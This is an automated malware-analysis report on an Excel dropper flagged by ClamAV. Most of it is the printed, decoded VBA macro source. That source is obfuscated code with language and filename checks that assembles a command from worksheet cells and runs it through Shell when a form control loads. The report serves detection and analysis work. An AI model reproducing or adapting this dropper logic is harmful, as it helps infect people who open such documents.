MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA macros. This function is used to execute external commands, strongly suggesting the macro's purpose is to download and run a secondary payload. The ClamAV detection name 'Xls.Dropper.Agent-7577356-0' further supports this dropper functionality.
Heuristics 3
-
ClamAV: Xls.Dropper.Agent-7577356-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Agent-7577356-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2007 bytes |
SHA-256: cd351f1cac48b61d088c2e1a924d1dab5ab8d086161c7d5eb68daf56dc4735e3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Questa_cartella_di_lavoro"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Const ogg = 10
Const j = 1
Function Personolizza(f As String)
Dim Stampa() As String
Stampa() = Split(f)
cd = ""
ks = Application.CountA(Stampa)
For y = 0 To ks - j
cd = cd + Mid(Stampa(y), j, j) + Right(Stampa(y), j)
Next y
Personolizza = cd
End Function
Sub messagio()
If (msoAnimationDisappear * ogg * ogg + ogg + ogg) / 3 <> Riento Then Gestione
bool = al(ogg + ogg, 38 - ogg)
End Sub
Function al(ro, ce As Integer)
Dim pee As String: pee = "": Dim i As Integer
For i = ro To ce
fq = Cells(i, 5)
pee = pee + fq
Next i
Shell Left(Replace(Personolizza(pee), "!", " "), Len(Replace(Personolizza(pee), "!", " ")) - j), msoButtonSetAbortRetryIgnore - ogg: Dim P As Workbook: Set P = Workbooks.Add
End Function
Private Function Aumenta()
Aumenta = msoLanguageIDUI
End Function
Private Function Riento()
Riento = Application.LanguageSettings.LanguageID(Aumenta)
End Function
Sub Gestione()
ActiveWorkbook.Close savechanges:=False
End Sub
Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Pachetti, 1, 0, MSForms, Frame"
Attribute VB_Control = "documento, 3, 1, MSForms, CommandButton"
Function Annulla()
kl = ActiveWorkbook.Name
If kl Like "*_*" Then Annulla = 2 Else Questa_cartella_di_lavoro.Gestione
End Function
Private Sub Pachetti_Layout()
If Annulla > 0 Then Questa_cartella_di_lavoro.messagio
End Sub
Private Sub documento_Click()
Pachetti_Layout
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.